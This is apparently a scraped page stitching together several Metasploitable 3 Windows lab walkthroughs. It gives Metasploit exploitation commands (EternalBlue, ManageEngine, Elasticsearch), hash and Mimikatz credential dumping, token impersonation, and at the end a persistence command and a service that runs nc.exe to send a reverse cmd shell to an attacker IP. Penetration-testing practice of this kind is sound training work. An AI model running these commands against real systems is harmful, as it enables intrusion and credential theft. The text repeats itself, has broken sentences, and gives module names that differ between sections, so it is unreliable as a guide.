Metasploitable 3 Windows Walkthrough [SECURE | Hacks]
The first rule of engagement: Enumerate, enumerate, enumerate. We cannot attack what we do not know exists.
We start with a quick Nmap scan to identify open ports and running services.
nmap -sV -sC -p- -T4 <Target_IP> -oN ms3_scan.txt
Metasploitable 3 often has two network interfaces: NAT (internet) and Host-Only (192.168.56.x). You can pivot into the host-only network.
run autoroute -s 192.168.56.0/24
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.1-255
set PORTS 445
run
You might find your actual host machine. Do not scan without authorization.
# Ping sweep to confirm target is alive
nmap -sn 192.168.1.100
This walkthrough provides a comprehensive guide to setting up and exploiting Metasploitable 3, a Windows-based vulnerable virtual machine designed by Rapid7 for penetration testing practice. 1. Introduction to Metasploitable 3
Unlike its predecessor (Metasploitable 2), version 3 is built from the ground up using automation tools. It focuses on modern vulnerabilities found in Windows environments, specifically Windows Server 2008 R2. It’s an essential playground for learning lateral movement, service exploitation, and privilege escalation. 2. Lab Environment Setup Before you begin, ensure your lab environment is ready: Target: Metasploitable 3 (Windows) Attacker: Kali Linux
Network: Both VMs should be on a Host-Only or NAT Network to ensure they can communicate while remaining isolated from the internet. 3. Phase 1: Reconnaissance & Scanning Start by identifying the target IP and open services. Nmap Scan: nmap -sV -sC -O -p- Use code with caution. What to look for: Port 80/443/8080: HTTP services (IIS, Apache, GlassFish).
Port 445: SMB (Potential for EternalBlue or share enumeration). Port 3306: MySQL. Port 9200: Elasticsearch. 4. Phase 2: Exploitation Vectors Vector A: Exploiting HTTP (Port 8080 - GlassFish)
Metasploitable 3 often runs a GlassFish server. This is a common entry point.
Search for Exploits: In Metasploit, search for glassfish_deployer. Configuration:
use exploit/multi/http/glassfish_deployer set RHOSTS set RPORT 8080 run Use code with caution. Result: If successful, you will gain a Meterpreter session. Vector B: Exploiting SMB (Port 445)
Since this is a Windows 2008 R2 machine, it might be vulnerable to MS17-010 (EternalBlue). Verify: Use auxiliary/scanner/smb/smb_ms17_010. Exploit:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS run Use code with caution.
Result: This typically grants SYSTEM level access immediately. 5. Phase 3: Post-Exploitation & Privilege Escalation
If you gained access as a low-privilege user (e.g., through a web app), you need to escalate. Enumeration with Local Exploit Suggester: Background your session (Ctrl+Z). use post/multi/recon/local_exploit_suggester. set SESSION 1 and run.
Common Target: Look for AlwaysInstallElevated registry keys or unquoted service paths. 6. Phase 4: Looting and Persistence Once you have admin/SYSTEM access:
Dump Hashes: Use hashdump in Meterpreter to grab NTLM hashes.
Mimikatz: Load the kiwi extension (load kiwi) to retrieve cleartext passwords from memory using creds_all.
Flags: Search the Administrator desktop and C:\ root for "flags" (usually .txt files) to complete the challenge. 7. Summary of Key Vulnerabilities Vulnerability Metasploit Module SMB exploit/windows/smb/ms17_010_eternalblue Elasticsearch RCE (CVE-2014-3120) exploit/multi/elasticsearch/script_static_eval Web Server ManageEngine Desktop Central exploit/windows/http/manageengine_connection_id_rce Conclusion metasploitable 3 windows walkthrough
Metasploitable 3 Windows is a goldmine for practicing "living off the land" techniques and understanding how misconfigured Windows services lead to full domain compromise. Always remember to document your steps, as the goal is to improve your reporting as much as your hacking.
Getting Metasploitable 3 up and running on a Windows host is like setting up a playground for aspiring ethical hackers. It’s a intentionally vulnerable machine designed by Rapid7 to help you practice everything from basic scanning to complex post-exploitation. Prerequisites
Before diving in, make sure your host machine is ready. You’ll need: VirtualBox or VMware: To host the virtual machine.
Vagrant: This automates the building and management of your VMs. Packer: Used for creating the machine images.
High Specs: At least 8GB of RAM and 50GB of disk space is recommended since these builds can be heavy. The Setup Process
Unlike Metasploitable 2, which was a simple downloadable file, Metasploitable 3 is built from scratch using scripts. This ensures you have the latest environment.
Install the Tools: Download and install VirtualBox, Vagrant, and Packer on your Windows machine.
Clone the Repository: Open PowerShell or Git Bash and run:git clone https://github.com
Build the Image: Navigate into the folder and use Packer to build the Windows 2008 image. This step can take a while (30-60 minutes) as it downloads the ISO and installs the OS:packer build windows_2008_r2.json
Launch with Vagrant: Once the build finishes, add the box to Vagrant and fire it up:vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3-winvagrant up The Walkthrough: A Typical Attack Cycle
Once the machine is running, you can start your "engagement" from a separate Kali Linux VM. 1. Reconnaissance and Scanning
Start by finding the target's IP address. Use Nmap to see what ports are open:nmap -sV -O [Target_IP]You’ll notice a wide attack surface, including HTTP (80), SMB (445), and various database ports like MySQL (3306). 2. Exploiting Web Vulnerabilities
Metasploitable 3 hosts several web applications. One common target is the ManageEngine Desktop Central instance. You can search for an exploit in Metasploit: msfconsole search manageengine
use exploit/windows/http/manageengine_connection_id_writeSet your RHOSTS and LHOST, then run exploit to gain a shell. 3. SMB and Internal Services
The machine is also vulnerable to classic Windows exploits. If you find the EternalBlue (MS17-010) vulnerability is unpatched, you can jump straight to SYSTEM-level access. use exploit/windows/smb/ms17_010_eternalblue exploit 4. Post-Exploitation
Once you have a Meterpreter session, the real fun begins. You can: Dump Hashes: Use hashdump to get user credentials.
Pivot: Use the machine as a jump box to explore other parts of the network.
Search for Flags: Metasploitable 3 includes "flags" (like a CTF) hidden throughout the system to reward your progress. Conclusion Metasploitable 3 often has two network interfaces :
Metasploitable 3 is more than just a target; it’s a masterclass in how modern Windows environments are structured and where they typically fail. By building it yourself and walking through these exploits, you gain a deep understanding of both the "how" and the "why" of cybersecurity. Happy hacking—stay ethical!
Metasploitable 3 Windows Walkthrough: A Comprehensive Guide If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.
This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills. 1. Lab Setup
Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.
Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin. Build the VM:
mkdir metasploitable3 && cd metasploitable3 vagrant init rapid7/metasploitable3-win2k8 vagrant up Use code with caution.
Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance. 2. Information Gathering
The first step in any engagement is reconnaissance. Let’s identify the open ports and services. Nmap Scan: nmap -sV -sC -O 192.168.x.x Use code with caution. You will notice a massive attack surface, including: Port 80/443: IIS 7.5 Port 445: SMB Port 1433: MSSQL Port 3306: MySQL Port 9200: Elasticsearch
3. Exploitation Path A: ElasticSearch (Remote Code Execution)
ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.
Search for the exploit: In Metasploit, use search elasticsearch. Configure:
use exploit/multi/elasticsearch/script_static_iv_clobber set RHOSTS [Target IP] set LHOST [Your IP] exploit Use code with caution.
Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed. 4. Exploitation Path B: ManageEngine Desktop Central
Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).
Search: use exploit/windows/http/manageengine_connectionid_write. Execute: Set your RHOSTS and RPORT (usually 8020).
Result: This often grants SYSTEM level access immediately, as the service runs with high privileges. 5. Exploitation Path C: Weak Credentials (SMB/MSSQL)
Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.
SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists. You might find your actual host machine
MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell. 6. Post-Exploitation & Privilege Escalation
Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution.
Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:
use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" Use code with caution. 7. The Flags
Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.
Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.
By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.
🛡️ Penetration Testing Report: Metasploitable 3 (Windows) 1. Executive Summary
This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies. Target Details: Operating System: Windows Server 2008 R2 (Metasploitable 3) IP Address: 192.168.1.36 (Example IP) Testing Machine: Kali Linux 2. Methodology & Phases
The engagement followed the standard penetration testing execution standard: Reconnaissance & Scanning: Discovering live hosts and open ports. Vulnerability Analysis: Identifying outdated software and weak configurations. Exploitation: Gaining initial access to the system. Privilege Escalation: Elevating standard user access to administrative rights. 3. Detailed Walkthrough 🔍 Phase 1: Scanning & Enumeration
The initial step involved identifying exposed attack surfaces using Nmap. nmap -sV -sC -A Use code with caution. Copied to clipboard
Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)
To make this walkthrough smooth, set both VMs to a Host-Only Network (or a custom NAT network). This isolates the carnage from your physical router.
Verify connectivity: ping 192.168.56.102 from Kali.
Metasploit method:
run persistence -U -i 10 -p 4444 -r 192.168.56.102
Manual – Create a service:
sc create "UpdateService" binpath= "cmd.exe /k C:\path\to\nc.exe 192.168.56.102 443 -e cmd.exe" start= auto